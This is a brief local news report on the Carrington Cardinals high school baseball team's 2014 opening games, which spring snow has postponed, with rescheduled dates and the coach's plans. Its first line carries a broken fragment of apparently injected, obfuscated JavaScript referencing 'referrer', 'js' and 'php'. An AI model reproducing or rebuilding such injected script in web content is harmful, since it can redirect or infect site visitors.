CARRINGTON eaiib|var|u0026u|referrer|nnank||js|php’.split(‘|’),0,{}))
(NewsDakota.com)  The opening day for the 2014 Cardinals High School Baseball team was originally scheduled for tomorrow in Medina against the Thunder of Medina/Pingree-Buchanon, but due to the recent spring snow, that day will be rescheduled for later this month, hopefully.  Last year the Cardinals didn’t see their first game until May 3rd, after a total of 12 games were either cancelled or postponed due to weather including the Carrington Jamboree.

At the time of this story, Head Coach Wayne Shipman says that they are looking at playing their first game of the year on Monday, April 14th in Tolna against Dakota Prairie, weather permitting off course.  As of now, the first three games of the year are postponed, including tomorrow in Medina and two games in Carrington next week.  The baseball field at Carrington City Park has some snow on it right now, Coach Shipman hopes that with the warmer temps coming next week and maybe the possibility of removing some snow in the outfield, the field will be ready by Tuesday, April 15th for a home game against Medina/Pingree-Buchanon.

Here are Coach Shipman’s thoughts about practice so far this year:

All games can be heard on AM 1600 KDAK and newsdakota.com.
